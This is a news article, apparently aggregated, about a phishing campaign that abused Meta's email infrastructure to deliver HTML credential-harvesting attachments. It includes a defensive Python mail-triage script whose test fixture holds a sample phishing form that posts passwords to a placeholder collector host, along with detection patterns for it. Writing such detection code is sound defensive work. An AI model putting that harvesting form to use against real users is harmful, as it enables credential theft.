Facebook Domain Hijacking: How Legitimate Meta Infrastructure Fuels Global Phishing

A sophisticated global phishing campaign has been uncovered that weaponizes Facebook's legitimate infrastructure to target thousands of businesses worldwide, security researchers have revealed. The attack campaign has distributed over 40,000 malicious emails originating from official Meta domains, effectively bypassing traditional email security measures by leveraging the trusted reputation of Facebook's email infrastructure.

This campaign represents a significant evolution in phishing tactics, where threat actors have moved beyond simple domain spoofing to actual exploitation of legitimate corporate infrastructure. By sending emails from verified Facebook domains, attackers have managed to achieve exceptionally high delivery rates while maintaining low detection scores across conventional security platforms.

European businesses appear to be the primary focus of this campaign, with attackers using carefully crafted HTML attachments that deploy credential harvesting pages mimicking legitimate corporate login portals. The HTML files are designed to bypass attachment filtering while maintaining the appearance of legitimate business communications.

Technical analysis reveals that the attackers are exploiting Meta's email sending capabilities, though the exact method of compromise remains under investigation. Security experts suggest this could involve compromised business accounts with elevated sending privileges, API vulnerabilities, or other forms of infrastructure misuse.

The phishing emails typically arrive with convincing subject lines related to business operations, account verification, or security alerts. When recipients open the HTML attachments, they're presented with login pages that closely resemble legitimate corporate authentication systems, complete with proper branding and security indicators.

What makes this campaign particularly dangerous is the combination of legitimate sending infrastructure with sophisticated social engineering. Recipients see emails coming from verified Facebook domains, which naturally lowers their suspicion and increases the likelihood of engagement with malicious content.

Security teams are facing unprecedented challenges in detecting these attacks. Traditional email security solutions that rely on domain reputation scoring are effectively neutralized, as the emails originate from legitimate, high-reputation sources. Similarly, DMARC, DKIM, and SPF checks all pass successfully since the emails are genuinely sent from Facebook's infrastructure.

The campaign highlights a growing trend where threat actors are increasingly targeting the infrastructure of major technology providers rather than just their users. This approach provides attackers with multiple advantages: higher email delivery rates, improved credibility, and reduced detection likelihood.

Organizations are advised to implement multi-layered defense strategies including advanced attachment sandboxing, user behavior analytics, and comprehensive security awareness training. Employees should be educated about the possibility of legitimate domains being used for malicious purposes and trained to scrutinize all email attachments regardless of sender reputation.

Security researchers recommend implementing additional verification steps for emails containing HTML attachments, even when they originate from trusted domains. Organizations should also consider deploying solutions that can analyze the content and behavior of HTML attachments in isolated environments before they reach end users.
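The mail-gateway rule these recommendations describe can be written down concretely. The following is an added example for this page, not tooling from the researchers, from Meta, or from any vendor named here: it parses a constructed RFC 5322 message, records which of SPF, DKIM and DMARC passed, and still holds any HTML attachment for sandboxing, escalating to quarantine when the attachment contains a form that collects a password. The sender domain, the Authentication-Results values and the attachment body are constructed placeholders; the header-name and MIME handling uses only the Python standard library.

```python
"""Triage rule: hold HTML attachments even when sender authentication passes.

Illustrative code added for this article. It assumes the local MTA stamps an
Authentication-Results header before the filter runs, and that the raw
message is available as text. All domains and header values below are
constructed placeholders, not indicators from the campaign.
"""
import re
from email import message_from_string, policy
from email.message import EmailMessage

# Constructed sample: SPF/DKIM/DMARC all pass (as the article notes they do
# when mail genuinely leaves the provider's infrastructure), and the message
# carries an .html attachment holding a login form.
SAMPLE_RAW = """\
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=mail.provider.example;
 dkim=pass header.d=mail.provider.example; dmarc=pass header.from=mail.provider.example
From: Business Support <no-reply@mail.provider.example>
To: finance@example.net
Subject: Action required: verify your business account
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Please open the attached form to verify your account.
--b1
Content-Type: text/html; name="verify.html"
Content-Disposition: attachment; filename="verify.html"

<html><body><form action="https://collector.example/login" method="post">
<input name="user"><input type="password" name="pass"></form></body></html>
--b1--
"""

# Constructed benign control: same authenticated sender, plain-text body only.
CLEAN_RAW = """\
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=mail.provider.example;
 dkim=pass header.d=mail.provider.example; dmarc=pass header.from=mail.provider.example
From: Business Support <no-reply@mail.provider.example>
To: finance@example.net
Subject: Your monthly summary
Content-Type: text/plain; charset=utf-8

Your summary is available in your account dashboard.
"""

AUTH_PASS = re.compile(r"\b(spf|dkim|dmarc)=pass\b", re.I)
FORM_TAG = re.compile(r"<form\b", re.I)
PASSWORD_INPUT = re.compile(r"<input[^>]*type\s*=\s*[\"']?password", re.I)
HTML_EXT = (".html", ".htm", ".shtml", ".xhtml")


def auth_results(msg: EmailMessage) -> dict:
    """Return which of spf/dkim/dmarc show 'pass' in Authentication-Results."""
    found = {"spf": False, "dkim": False, "dmarc": False}
    for hdr in msg.get_all("Authentication-Results", []):
        for mech in AUTH_PASS.findall(str(hdr)):
            found[mech.lower()] = True
    return found


def html_attachments(msg: EmailMessage) -> list:
    """Collect (filename, decoded text) for every part that is an HTML attachment.

    Both the declared MIME type and the file extension are checked, so a
    text/html part disguised under another type but named .htm is still caught.
    """
    out = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        fname = part.get_filename() or ""
        looks_html = (part.get_content_type() == "text/html"
                      or fname.lower().endswith(HTML_EXT))
        if part.is_attachment() and looks_html:
            payload = part.get_payload(decode=True) or b""
            out.append((fname, payload.decode("utf-8", "replace")))
    return out


def triage(raw: str) -> dict:
    """Decide whether a message may be delivered or must be held first.

    The key point from the article: a passing SPF/DKIM/DMARC result proves
    only that the mail left the named provider's infrastructure, so it never
    downgrades the verdict for an HTML attachment.
    """
    msg = message_from_string(raw, policy=policy.default)
    auth = auth_results(msg)
    attachments = html_attachments(msg)
    indicators = [f"{name}: HTML form collecting a password"
                  for name, body in attachments
                  if FORM_TAG.search(body) and PASSWORD_INPUT.search(body)]
    verdict = "deliver"
    if attachments:
        verdict = "quarantine" if indicators else "sandbox"
    return {
        "from": str(msg["From"]),
        "auth_all_pass": all(auth.values()),
        "html_attachments": [name for name, _ in attachments],
        "indicators": indicators,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for label, raw in (("sample", SAMPLE_RAW), ("clean", CLEAN_RAW)):
        print(label, triage(raw))
```

The verdict for the constructed sample is `quarantine` with `auth_all_pass` still `True`, which is exactly the case domain-reputation scoring misses; the benign control is delivered. In a real gateway the `sandbox` branch would hand the attachment to an isolated detonation environment rather than simply labelling it.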

The discovery of this campaign serves as a stark reminder that in modern cybersecurity, trust cannot be automatically granted based on domain reputation alone. As threat actors continue to evolve their tactics, security professionals must adapt their defensive strategies to address the blurring lines between legitimate and malicious infrastructure usage.

Meta has been notified of the campaign and is reportedly investigating the abuse of their infrastructure. Meanwhile, businesses worldwide are urged to review their email security configurations and ensure they have adequate protection against this emerging threat vector that exploits the very trust relationships that underpin modern business communications.

NewsSearcher AI-powered news aggregation
